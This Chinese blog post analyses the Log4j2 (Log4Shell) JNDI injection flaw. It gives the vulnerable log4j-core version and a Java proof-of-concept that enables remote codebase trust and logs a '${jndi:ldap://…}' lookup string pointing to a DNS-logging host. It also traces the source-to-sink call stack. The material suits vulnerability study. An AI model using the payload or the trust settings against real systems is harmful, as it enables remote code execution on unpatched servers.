首页 > 其他分享 >Log4j2 漏洞

Log4j2 漏洞

时间:2024-09-22 17:01:30浏览次数:7  
标签:core logging 漏洞 lookup apache org Log4j2 log4j

什么是Log4j2

Log4j是一个用于Java应用程序的日志记录工具,它提供了灵活的日志记录配置和强大的日志记录功能。Log4j允许开发人员在应用程序中记录不同级别的日志消息,并将这些消息输出到不同的目标(例如控制台、文件、数据库等)。

漏洞版本

<dependencies>  
    <dependency>        
        <groupId>org.apache.logging.log4j</groupId>  
        <artifactId>log4j-core</artifactId>  
        <version>2.14.1</version>  
    </dependency>
</dependencies>

漏洞代码

package org.example;  
  
import org.apache.logging.log4j.LogManager;  
import org.apache.logging.log4j.Logger;  
  
public class Log4jTest {  
    public static void main(String[] args) {  
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");//u121,java超过这个版本要设置参数  
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");//u221,java超过这个版本要设置参数  
        Logger logger = LogManager.getLogger();  
        logger.error("${jndi:ldap://7a40b74a.log.dnslog.biz.}");  
    }  
}

漏洞分析

sink点:
org.apache.logging.log4j.core.net.JndiManager#lookup方法使用了InitialContext的lookup方法,造成jndi注入。
source点:
org.apache.logging.log4j.spi.AbstractLogger#error(java.lang.String)方法。

调用过程

lookup:172, JndiManager (org.apache.logging.log4j.core.net)
lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup)
lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)
resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup)
replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup)
format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern)
format:38, PatternFormatter (org.apache.logging.log4j.core.pattern)
toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)
toText:244, PatternLayout (org.apache.logging.log4j.core.layout)
encode:229, PatternLayout (org.apache.logging.log4j.core.layout)
encode:59, PatternLayout (org.apache.logging.log4j.core.layout)
directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config)
callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config)
callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config)
callAppender:84, AppenderControl (org.apache.logging.log4j.core.config)
callAppenders:540, LoggerConfig (org.apache.logging.log4j.core.config)
processLogEvent:498, LoggerConfig (org.apache.logging.log4j.core.config)
log:481, LoggerConfig (org.apache.logging.log4j.core.config)
log:456, LoggerConfig (org.apache.logging.log4j.core.config)
log:63, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config)
log:161, Logger (org.apache.logging.log4j.core)
tryLogMessage:2205, AbstractLogger (org.apache.logging.log4j.spi)
logMessageTrackRecursion:2159, AbstractLogger (org.apache.logging.log4j.spi)
logMessageSafely:2142, AbstractLogger (org.apache.logging.log4j.spi)
logMessage:2017, AbstractLogger (org.apache.logging.log4j.spi)
logIfEnabled:1983, AbstractLogger (org.apache.logging.log4j.spi)
error:740, AbstractLogger (org.apache.logging.log4j.spi)
main:11, Log4jTest (org.example)

标签:core,logging,漏洞,lookup,apache,org,Log4j2,log4j
From: https://www.cnblogs.com/Ho1dF0rward/p/18425530

相关文章

  • Shiro漏洞复现-springboot运行报错的解决 && 项目本地tomcat部署
    一、Springboot项目运行出现的种种问题:首先需要下载环境代码,来源Github等开源平台,下载解压后使用IDEA打开,由于Shiro通常与Springboot项目捆绑,所以通常运行需要Springboot环境,如下图所示:运行时可能会出现如下报错:unabletostartServletWebServerApplicationcontextd......
  • 05-信息扫描&漏洞探测的工具使用
    1、安装并使用Nmap扫描一个地址(本机、VPS、虚拟机环境都可以),提供扫描结果截图在https://nmap.org/nmap官网下载对应的操作系统版本文件。安装完成后对本机10.0.0.151进行-A(探测操作系统及版本),-T4(加速扫描),-sS(半连接扫描)。2、安装并使用Xray被动扫描,提供过程文档+......
  • xss跨站漏洞总结
    1.原理指攻击者利用网站程序对用户输入过滤的不足,输入可以显示在页面对其他用户造成影响的HTML代码工具,从而盗取资料,获得管理员信息等。通俗来讲,xss跨站攻击就是寻找输入输出的地方,如url地址处的输入,留言板的输入,来进行js代码的注入,从而获取信息。输入地点:get,post,header,......
  • 用友U8CRM relobjreportlist.php SQL注入漏洞复现
    0x01漏洞描述:        用友U8CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。        用友U8CRM客户关系管理系统relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏......
  • 9.9付费进群系统 wxselect SQL注入漏洞复现
    0x01漏洞描述:2024年9.9付费进群Plus版系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。在位于/group/controlle......
  • 【log4j 2.x】【log4j日志升级漏洞修复】log4j2日志 [简单明了][一眼就会]
    大多同学说的不是很全,写的不是很具体。在此,本人出一篇简单明了的详细教程: 目录:1、加载log4j2包2、配置xml文件3、写测试并运行4、log指定文件:自动打印info、error日志5、整体code正文:1、加载log4j2包<dependency><groupId>org.apache.logging.log4j</group......
  • 常见中间件漏洞靶场(tomcat)
    1.CVE-2017-12615开启环境查看端口查看IP在哥斯拉里生成一个木马访问页面修改文件后缀和文件内容放包拿去连接2.后台弱⼝令部署war包打开环境将前边的1.jsp压缩成1.zip然后改名为1.war访问页面进行上传在拿去连接3.CVE-2020-1938打开环境访问一下来......
  • 基础网络安全-K8S之安全漏洞扫描
    一、前言在之前的文章《Docker安全学习之——Docker安全总结》中介绍了docker搭建后使用工具进行漏洞扫描,本篇则是介绍的在K8S搭建后需要开展的扫描工作,包括K8S自身的组件以及docker镜像等,这里介绍的是trivy这一款工具。二、工具简要介绍Trivy工具的GITHUB地址为:https://github.co......
  • vCenter最新漏洞CVE-2024-38812, CVE-2024-38813修复
    第1章前言 我们从Broadcom获悉,2024年9月17日,Broadcom公布了VMwarevCneterServer、和VMwareCloudFoundation产品存在多个安全性漏洞(CVE-2024-38812,CVE-2024-38813)本次漏洞CVSS分数为9.8,漏洞评级为高危,建议大家尽快升级。当前受影响版本为:VMwarevCenterServer8.......
  • Apache-Shiro <=1.2.4 反序列化漏洞 (代码审计)
    一、ApacheShiro简介:ApacheShiro提供了认证、授权、加密和会话管理功能,将复杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实现此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。......